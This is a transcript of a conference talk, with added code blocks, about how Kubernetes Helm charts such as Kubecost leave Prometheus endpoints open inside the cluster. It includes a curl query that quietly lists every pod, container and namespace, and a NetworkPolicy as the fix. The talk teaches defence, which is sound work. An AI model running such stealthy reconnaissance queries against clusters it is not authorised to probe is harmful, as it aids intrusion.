make an API request on our behalf. So we're going to deploy it out to the cluster. Um, and then we're going to let that go, and it's going to spin up, and it's going to be initializing here. Yep. Okay. So, in here we've got, on line 12, the API for Kubecost. Uh, this isn't just any API. This is actually the Prometheus API endpoint, which monitoring teams use to monitor the health of applications. Uh, and then we are going to format the data and print it out to the screen in a really handy, friendly way to us, basically. And we're just picking on Kubecost here. There are lots of other applications that have the same exact problem. Uh,
basically, what it comes down to is, when you install a Helm chart, uh, they don't put security around these endpoints, because they just open it to the cluster. And so with one single API call to Kubecost, we have information about all of the load balancers, we have information about all of the nodes in the cluster, and we also have all of the pods and what containers are in them, as well as what namespace they're running in. Uh, from a forensics point of view, from a responder point of view, this is nearly invisible, because we're not talking to the Kubernetes API. We're not making hundreds and millions of requests to the network to say what API endpoints
exist here. We're making one API request that blends in with normal traffic. Um, let's go back.
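That one request might look something like this from any pod in the cluster. The service name, port, and metric are assumptions based on a default Kubecost Helm install (which bundles its own Prometheus); adjust to whatever the chart actually created in your environment:

```
# One unauthenticated query to the bundled Prometheus lists every namespace, pod,
# container and image it has scraped -- no Kubernetes API calls, no port scanning.
curl -s "http://kubecost-prometheus-server.kubecost.svc.cluster.local/api/v1/query?query=kube_pod_container_info"
```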
You don't even need to scan for open ports. Uh, so Kubecost will happily tell you what services are running and where they're listening. Other applications, like Istio, they'll dump that information as well. Um, Argo has all that information as well. And a lot of them have open Prometheus listening endpoints. Um, the big fix here is network policies. You can think of a network policy as a firewall rule around your workloads. Most of the time those aren't deployed by default in Helm charts, because the application owners, the maintainers of those applications, they don't know your environment. They don't know what teams need access to the data. So they just leave it open and up to you, which is kind of the ethos of Kubernetes: it's up to you to secure it.
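A minimal sketch of that kind of rule — a default-deny ingress policy for a hypothetical monitoring namespace (and note it only does anything if your CNI actually enforces NetworkPolicy):

```
kubectl apply -f - <<'EOF'
# Deny all inbound traffic to every pod in the "monitoring" namespace (name is hypothetical).
# Allowed sources then have to be added back deliberately with further policies.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
  namespace: monitoring
spec:
  podSelector: {}        # empty selector = every pod in the namespace
  policyTypes:
    - Ingress            # no ingress rules listed, so nothing is allowed in
EOF
```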
And so again here, it's up to you to secure it. Um, you need to ask yourself, though, who manages those rules, because it's a political battle inside your organization where no one wants to manage them. Okay, that was like a speedrun of the last little bit there. Um, any questions, uh, while we have some time left? And then, uh, please remember, rate us five stars. Oh, stop. You'll have to come up here and ask us questions. >> Thank you so much for taking the time. Yeah. >> [applause]